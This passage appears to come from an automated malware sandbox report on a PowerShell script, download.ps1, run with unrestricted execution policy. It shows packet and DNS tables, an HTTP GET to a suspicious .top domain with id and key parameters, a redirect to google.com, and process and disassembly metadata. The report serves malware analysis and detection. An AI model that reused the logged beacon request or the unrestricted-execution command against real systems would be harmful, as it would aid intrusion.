                                                                                                              Jan 5, 2025 16:31:04.036086082 CET4975180192.168.11.2045.61.136.138
                                                                                                              Jan 5, 2025 16:31:04.207434893 CET804975145.61.136.138192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.239950895 CET804975145.61.136.138192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.288233042 CET4975180192.168.11.2045.61.136.138
                                                                                                              Jan 5, 2025 16:31:04.364576101 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.482969046 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.483182907 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.483331919 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.601681948 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.664133072 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.664231062 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.664338112 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.664447069 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.664455891 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.664513111 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.664655924 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.664772987 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.664803982 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.664911032 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.664975882 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.665034056 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.665113926 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.665138960 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.665344000 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.782922983 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.782936096 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.783073902 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.787231922 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.787260056 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.787492990 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.795859098 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.795891047 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.796176910 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.804538965 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.804596901 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.804867983 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.813126087 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.813194990 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.813400984 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.821799994 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.821832895 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.822343111 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.830439091 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.830499887 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.830759048 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.839068890 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.839279890 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.839520931 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.847759962 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.847800970 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.848093033 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.856379032 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.856448889 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.856694937 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.901613951 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.901688099 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.901901007 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.905867100 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.906085014 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.906292915 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.914530993 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.914622068 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.914977074 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.922019005 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.922099113 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.922255993 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.929433107 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.929493904 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.929661989 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.936911106 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.937060118 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.937421083 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.944504023 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.944601059 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.944844007 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:04.951843023 CET8049752142.250.191.100192.168.11.20
                                                                                                              Jan 5, 2025 16:31:05.006830931 CET4975280192.168.11.20142.250.191.100
                                                                                                              Jan 5, 2025 16:31:05.132905006 CET4975180192.168.11.2045.61.136.138
                                                                                                              Jan 5, 2025 16:31:05.133430004 CET4975280192.168.11.20142.250.191.100

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 5, 2025 16:31:03.413660049 CET4965853192.168.11.201.1.1.1
                                                                                                              Jan 5, 2025 16:31:03.854124069 CET53496581.1.1.1192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.241660118 CET5967853192.168.11.201.1.1.1
                                                                                                              Jan 5, 2025 16:31:04.363552094 CET53596781.1.1.1192.168.11.20

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 5, 2025 16:31:03.413660049 CET192.168.11.201.1.1.10xc25bStandard query (0)kcehmenjdibnmni.topA (IP address)IN (0x0001)false
                                                                                                              Jan 5, 2025 16:31:04.241660118 CET192.168.11.201.1.1.10xa046Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 5, 2025 16:31:03.854124069 CET1.1.1.1192.168.11.200xc25bNo error (0)kcehmenjdibnmni.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                              Jan 5, 2025 16:31:04.363552094 CET1.1.1.1192.168.11.200xa046No error (0)www.google.com142.250.191.100A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • kcehmenjdibnmni.top
                                                                                                              • www.google.com

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.11.204975145.61.136.138805816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 5, 2025 16:31:04.036086082 CET215OUTGET /sgat4cebpihtr.php?id=computer&key=24472055606&s=527 HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                              Host: kcehmenjdibnmni.top
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 5, 2025 16:31:04.239950895 CET166INHTTP/1.1 302 Found
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Sun, 05 Jan 2025 15:31:04 GMT
                                                                                                              Content-Length: 0
                                                                                                              Connection: keep-alive
                                                                                                              Location: http://www.google.com


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.11.2049752142.250.191.100805816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 5, 2025 16:31:04.483331919 CET159OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                              Host: www.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 5, 2025 16:31:04.664133072 CET1289INHTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 15:31:04 GMT
                                                                                                              Expires: -1
                                                                                                              Cache-Control: private, max-age=0
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-SW-sv7i-eaS8-XCWYx_-eg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Server: gws
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Set-Cookie: AEC=AZ6Zc-V4EKPVYhSZCrvb1GNCQCtcH7QyOUGBTpDWdDO1YNZgR8lN8tT0VA; expires=Fri, 04-Jul-2025 15:31:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                              Set-Cookie: NID=520=nEPJy9fiKK-XhKUOFwTYX_mq2KG0foqDEKAqvV45rZ7cx8HhfbFxq3MMnR6AfSzt4gI4l4E7_2dXhtH0cDYD6LbiHW5YieZzX6YtnVBY86GfzCMTN6kgHxSjzVgNn-ODDYyZWYyTG1yYOTl6etIo03yX64GC2g_quCdiMwcOi-G3KCJxtmVxTgjlI2pveWGctXjmv7WK; expires=Mon, 07-Jul-2025 15:31:04 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                              Accept-Ranges: none
                                                                                                              Vary: Accept-Encoding
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Data Raw: 34 32 61 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68
                                                                                                              Data Ascii: 42ac<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to h
                                                                                                              Jan 5, 2025 16:31:04.664231062 CET1289INData Raw: 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e
                                                                                                              Data Ascii: elp you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.
                                                                                                              Jan 5, 2025 16:31:04.664338112 CET1289INData Raw: 2c 33 37 36 2c 35 2c 31 30 35 2c 36 35 30 2c 33 39 34 2c 31 35 2c 36 39 35 2c 33 2c 32 33 37 2c 31 33 2c 31 31 38 2c 36 32 30 2c 31 36 30 2c 36 34 32 2c 39 33 2c 32 33 31 2c 33 36 2c 31 2c 34 34 34 2c 33 34 32 2c 31 30 37 2c 35 38 33 2c 33 32 2c
                                                                                                              Data Ascii: ,376,5,105,650,394,15,695,3,237,13,118,620,160,642,93,231,36,1,444,342,107,583,32,467,2,133,517,337,486,277,527,36,465,867,2,259,87,1091,271,5,76,845,6,569,51,1,54,778,129,685,24,109,290,8,209,3,15,119,333,40,446,1,6,289,3,48,506,74,3,3,201,29
                                                                                                              Jan 5, 2025 16:31:04.664447069 CET1289INData Raw: 6e 67 28 29 3b 67 2e 5f 63 73 68 69 64 26 26 66 26 26 28 63 2b 3d 22 26 63 73 68 69 64 3d 22 2b 67 2e 5f 63 73 68 69 64 29 3b 28 64 3d 64 28 29 29 26 26 28 63 2b 3d 22 26 6f 70 69 3d 22 2b 64 29 3b 72 65 74 75 72 6e 22 2f 22 2b 28 68 7c 7c 22 67
                                                                                                              Data Ascii: ng();g._cshid&&f&&(c+="&cshid="+g._cshid);(d=d())&&(c+="&opi="+d);return"/"+(h||"gen_204")+"?atyp=i&ct="+String(a)+"&cad="+(b+e+c)};l=google.kEI;google.getEI=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){
                                                                                                              Jan 5, 2025 16:31:04.664513111 CET1289INData Raw: 7d 65 6c 73 65 20 61 3d 21 31 3b 61 26 26 28 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 62 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 29 7d 2c 21 30 29 3b 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65
                                                                                                              Data Ascii: }else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventListener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohr
                                                                                                              Jan 5, 2025 16:31:04.664655924 CET1289INData Raw: 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 2d 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 77 65 62 6b 69 74 2d 62
                                                                                                              Data Ascii: olid #bebebe;background:#fff;-moz-box-shadow:-1px 1px 1px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.2);box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visi
                                                                                                              Jan 5, 2025 16:31:04.664772987 CET1289INData Raw: 30 2c 2e 32 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30
                                                                                                              Data Ascii: 0,.2);-moz-box-shadow:0 2px 4px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbzt,.gbgt{cursor:pointer;display:block;text-decoration:none !important}span#gbg6,span#gbg4{cursor:default}.gbts{border-left:1px solid transparent;bord
                                                                                                              Jan 5, 2025 16:31:04.664911032 CET1289INData Raw: 34 73 31 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 23 67 62 67 36 2e 67 62 67 74 2d 68 76 72 2c 23 67 62 67 36 2e 67 62 67 74 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b
                                                                                                              Data Ascii: 4s1{font-weight:bold}#gbg6.gbgt-hvr,#gbg6.gbgt:focus{background-color:transparent;background-image:none}.gbg4a{font-size:0;line-height:0}.gbg4a .gbts{padding:27px 5px 0;*padding:25px 5px 0}.gbto .gbg4a .gbts{padding:29px 5px 1px;*padding:27px
                                                                                                              Jan 5, 2025 16:31:04.664975882 CET1289INData Raw: 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 69 6e
                                                                                                              Data Ascii: .gbmt:visited{display:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:visited{padding:0 10px}.gbml1-hvr,.gbml1:focus{outline:none;te
                                                                                                              Jan 5, 2025 16:31:04.665138960 CET1289INData Raw: 62 6d 70 73 7b 2a 7a 6f 6f 6d 3a 31 7d 23 67 62 64 34 20 2e 67 62 70 63 2c 23 67 62 6d 70 61 73 20 2e 67 62 6d 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 37 70 78 7d 23 67 62 64 34 20 2e 67 62 70 67 73 20 2e 67 62 6d 74 63 7b 6c 69 6e 65 2d 68
                                                                                                              Data Ascii: bmps{*zoom:1}#gbd4 .gbpc,#gbmpas .gbmt{line-height:17px}#gbd4 .gbpgs .gbmtc{line-height:27px}#gbd4 .gbmtc{border-bottom:1px solid #bebebe}#gbd4 .gbpc{display:inline-block;margin:16px 0 10px;padding-right:50px;vertical-align:top}#gbd4 .gbpc{*di
                                                                                                              Jan 5, 2025 16:31:04.782922983 CET1289INData Raw: 32 30 70 78 20 31 30 70 78 7d 2e 67 62 6d 70 69 61 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 70 78 3b 6d 61 72 67 69
                                                                                                              Data Ascii: 20px 10px}.gbmpiaw{display:inline-block;padding-right:10px;margin-bottom:6px;margin-top:10px}.gbxv{visibility:hidden}.gbmpiaa{display:block;margin-top:10px}.gbmpia{border:none;display:block;height:48px;width:48px}.gbmpnw{display:inline-block;h


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:10:31:00
                                                                                                              Start date:05/01/2025
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                              Imagebase:0x7ff7ddfe0000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:1
                                                                                                              Start time:10:31:00
                                                                                                              Start date:05/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7144b0000
                                                                                                              File size:875'008 bytes
                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Executed Functions

                                                                                                                Function 00007FFF3CB6363C Relevance: .1, Instructions: 85COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.48238424694.00007FFF3CB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF3CB60000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7fff3cb60000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2735c661fd8a8f4e0b640a71491b2dec209f20b4245bf84551d9e6b5131253f8
                                                                                                                • Instruction ID: b54a34eefa96503b1bfcc3c23cb43604926e38cce395690dfc1cce7aea6526c2
                                                                                                                • Opcode Fuzzy Hash: 2735c661fd8a8f4e0b640a71491b2dec209f20b4245bf84551d9e6b5131253f8
                                                                                                                • Instruction Fuzzy Hash: E9210A31A1895D8FDF94EF58C445EE9B7E1FF68314F140166D409D7296CA24EC92CBC1
                                                                                                                Function 00007FFF3CA4EE9C Relevance: .1, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.48237928089.00007FFF3CA4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF3CA4D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7fff3ca4d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1ee29880683d35bed0b2255b1e7697179565ed15daf7ac336db4fb2961d596c1
                                                                                                                • Instruction ID: 9447d31a1215d2a5998a7cacb2c220cd4567cc27957a6fd359386e27b7ae13c1
                                                                                                                • Opcode Fuzzy Hash: 1ee29880683d35bed0b2255b1e7697179565ed15daf7ac336db4fb2961d596c1
                                                                                                                • Instruction Fuzzy Hash: 1711217150CF088F9B98EF1DE44595677E0FB98321B10465FD459C7665D731E881CBC1
                                                                                                                Function 00007FFF3CDD7298 Relevance: .1, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.48241428205.00007FFF3CDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF3CDD0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7fff3cdd0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b1b291f05cb1ec775f69e5d9288148393dbca79b5121606c1df0df2d87f0be36
                                                                                                                • Instruction ID: 6f513618fdfd2da45bc1dfe62bbb9254970576d4a7278188d5b42ee8d24cff94
                                                                                                                • Opcode Fuzzy Hash: b1b291f05cb1ec775f69e5d9288148393dbca79b5121606c1df0df2d87f0be36
                                                                                                                • Instruction Fuzzy Hash: 6B115230B08E498BDF59EB28C465A65B7E1FF59300B50459DE04BC7695DE24ED84CBC1
                                                                                                                Function 00007FFF3CB65395 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.48238424694.00007FFF3CB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF3CB60000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7fff3cb60000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c49df0cbec19912405622dad4e2f21d45a9d60a85907178273fe981a61a9486c
                                                                                                                • Instruction ID: 6cd14f021224ff95efa670c4465f90aecf145ea3920cd5d5cc002b7a7dabb424
                                                                                                                • Opcode Fuzzy Hash: c49df0cbec19912405622dad4e2f21d45a9d60a85907178273fe981a61a9486c
                                                                                                                • Instruction Fuzzy Hash: 9D01677111CB0C4FD754EF0CE451AA6B7E0FB99324F10056DE58AC3665D636E892CB46
                                                                                                                Function 00007FFF3CE12E94 Relevance: .0, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.48241801703.00007FFF3CE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF3CE10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7fff3ce10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b72f16afe5b64b4e7f0bcfcd68a5f5a5a2f408d300c6c0596a442f5a43752ed5
                                                                                                                • Instruction ID: 26edcb5a8c0b1578650fc3e917d9ace9d7897fbc7e6bf8d0c92706466ba1411c
                                                                                                                • Opcode Fuzzy Hash: b72f16afe5b64b4e7f0bcfcd68a5f5a5a2f408d300c6c0596a442f5a43752ed5
                                                                                                                • Instruction Fuzzy Hash: 81F0823131CA044BD744EE1CD445661B3D0FBA8310F10462EE44AC3651DA21E4818786
                                                                                                                Function 00007FFF3CE11C7C Relevance: .0, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.48241801703.00007FFF3CE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF3CE10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7fff3ce10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 41a9f6560cd2cf0d180a28ad90c65039af37fee1c67b9357d12eafd73f1f6e55
                                                                                                                • Instruction ID: 8c2ebca77bdfd7ba7cafa95025f982eb58a77e2fab51a7a304b183a11215bf9d
                                                                                                                • Opcode Fuzzy Hash: 41a9f6560cd2cf0d180a28ad90c65039af37fee1c67b9357d12eafd73f1f6e55
                                                                                                                • Instruction Fuzzy Hash: AEF03931A0C4198FE768EA0CF442AA873E1FF88324F1400B6E14ED7566DA22AC518B80